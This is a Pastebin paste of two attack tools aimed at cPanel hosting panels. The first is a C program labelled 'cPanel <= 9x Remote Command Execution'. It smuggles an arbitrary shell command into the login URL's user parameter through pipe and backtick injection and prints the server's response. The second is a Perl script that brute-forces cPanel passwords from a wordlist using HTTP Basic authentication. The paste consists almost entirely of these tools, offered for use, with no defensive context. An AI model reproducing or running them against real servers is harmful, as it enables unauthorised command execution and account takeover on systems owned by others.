Advertisement
wachiorsino

cPanel (HTTP) xploit

Dec 4th, 2014
433
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.57 KB | None | 0 0
  1. /*
  2. cPanel <= 9x Remote Command Execution
  3. //headers
  4. #include //In/Out
  5. #include //sockets functions
  6. #include //memory functions
  7. #include //strlen,strcat,strcpy
  8.  
  9. #pragma comment(lib,"ws2_32.lib") //for compile with dev-c++ link to "libws2_32.lib"
  10.  
  11. #define Port 2082 //port for connect to cPanel
  12. #define SIZE 1024 //buffer size to receive the data
  13.  
  14. /*connect host:port*/
  15. SOCKET Conecta(char *Host, short puerto)
  16. {
  17. /*struct for make the socket*/
  18. WSADATA wsaData;
  19. SOCKET Winsock;//listener socket
  20. /*two structures for connect*/
  21. struct sockaddr_in Winsock_In;
  22. struct hostent *Ip;
  23.  
  24. /*start the socket*/
  25. WSAStartup(MAKEWORD(2,2), &wsaData);
  26. /*make*/
  27. Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
  28.  
  29. //check socket status
  30. if(Winsock==INVALID_SOCKET)
  31. {
  32. /*exit*/
  33. WSACleanup();
  34. return -1;
  35. }
  36.  
  37. /*complete the struct*/
  38. Ip=gethostbyname(Host);
  39. Winsock_In.sin_port=htons(puerto);
  40. Winsock_In.sin_family=AF_INET;
  41. Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));
  42.  
  43. /*connect*/
  44. if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
  45. {
  46. /*end*/
  47. WSACleanup();
  48. return -1;
  49. }
  50.  
  51. return Winsock;
  52. }
  53.  
  54. /*MASTER FUNCTION*/
  55. int main(int argc, char *argv[])
  56. {
  57. /*the socket*/
  58. SOCKET sock;
  59. /*make the evil buffer to send the request*/
  60. char evil_request[]="GET /login/?user=|%22%60";
  61. char evil_request2[]="%60%22\r";
  62. char *evil;
  63. /*to receive the data*/
  64. char buf[SIZE];
  65.  
  66. printf("\n+[ cPanel <= 9x Remote Command Execution ]+ by Lympex");
  67. printf("\nContact: lympex[at]gmail[dot]com & http://l-bytes.net");
  68. printf("\n-----------------------------------------------------\n");
  69.  
  70. if(argc!=3)//cPanel_9x_rce.exe
  71. {
  72. printf("\n[+] Usage: %s \n",argv[0]);
  73. return 0;
  74. }
  75.  
  76. printf("\n[+] Connecting %s:%d...",argv[1],Port);
  77.  
  78. /*start the exploit*/
  79. sock=Conecta(argv[1],Port);//connect
  80. if(sock==-1)
  81. {
  82. printf("Error\n");
  83. return 1;
  84. }
  85.  
  86. printf("OK");
  87.  
  88. /*make the EVIL request*/
  89. evil=(char *) malloc((strlen(argv[2])+24+12)*sizeof(char));
  90. strcpy(evil,evil_request);strcat(evil,argv[2]);strcat(evil,evil_request2);strcat(evil,"\n\n");
  91.  
  92. //sends it
  93. send(sock,evil,strlen(evil),0);
  94.  
  95. buf[recv(sock,buf,SIZE,0)]='\0';
  96.  
  97. //show the data
  98. printf("\n\n------- [Result] -------\n\n%s\n------- [/Result] -------\n",buf);
  99.  
  100. WSACleanup();
  101. LocalFree(buf);
  102. LocalFree(evil);
  103. return 0;
  104. }
  105.  
  106. #!/usr/bin/perl
  107. # Cpanel Password Brute Forcer
  108. # —————————-
  109. # (c)jos_ali_joe
  110. # Perl Version ( low speed )
  111. # Oerginal Advisory :
  112. use IO :: Socket ;
  113. use LWP :: Simple ;
  114. use MIME :: Base64 ;
  115.  
  116. $host = $ARGV [ 0 ];
  117. $user = $ARGV [ 1 ];
  118. $port = $ARGV [ 2 ];
  119. $list = $ARGV [ 3 ];
  120. $file = $ARGV [ 4 ];
  121. $url = “http://” . $host . “:” . $port ;
  122. if(@ ARGV < 3 ){
  123. print q (
  124. ###############################################################
  125. # Cpanel Password Brute Force Tool #
  126. ###############################################################
  127. # usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
  128. #————————————————————-#
  129. # [Host] : victim Host (simorgh-ev.com) #
  130. # [User] : User Name (demo) #
  131. # [PORT] : Port of Cpanel (2082) #
  132. #[list] : File Of password list (list.txt) #
  133. # [File] : file for save password (password.txt) #
  134. # #
  135. ###############################################################
  136. # (c)jos_ali_joe / Indonesian Coder #
  137. ###############################################################
  138. );exit;}
  139.  
  140. headx ();
  141.  
  142. $numstart = “-1″ ;
  143.  
  144. sub headx () {
  145. print q (
  146. ###############################################################
  147. # Cpanel Password Brute Force Tool #
  148. # (c)jos_ali_joe / Indonesian Coder #
  149. ###############################################################
  150. );
  151. open ( PASSFILE , “<$list” ) || die “[-] Can’t open the List of password file !” ;
  152. @ PASSWORDS = < PASSFILE >;
  153. close PASSFILE ;
  154. foreach my $P (@ PASSWORDS ) {
  155. chomp $P ;
  156. $passwd = $P ;
  157. print ”
  158. [~] Try Password : $passwd
  159. ” ;
  160. & brut ;
  161. };
  162. }
  163. sub brut () {
  164. $authx = encode_base64 ( $user . “:” . $passwd );
  165. print $authx ;
  166. my $sock = IO :: Socket :: INET -> new ( Proto => “tcp” , PeerAddr => “$host” , PeerPort => “$port” ) || print ”
  167. [-] Can not connect to the host” ;
  168. print $sock “GET / HTTP/1.1
  169. ” ;
  170. print $sock “Authorization: Basic $authx
  171. ” ;
  172. print $sock “Connection: Close
  173.  
  174. ” ;
  175. read $sock , $answer , 128 ;
  176. close ( $sock );
  177.  
  178. if ( $answer =~ / Moved /) {
  179. print ”
  180. [~] PASSWORD FOUND : $passwd
  181. ” ;
  182. exit();
  183. }
  184. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement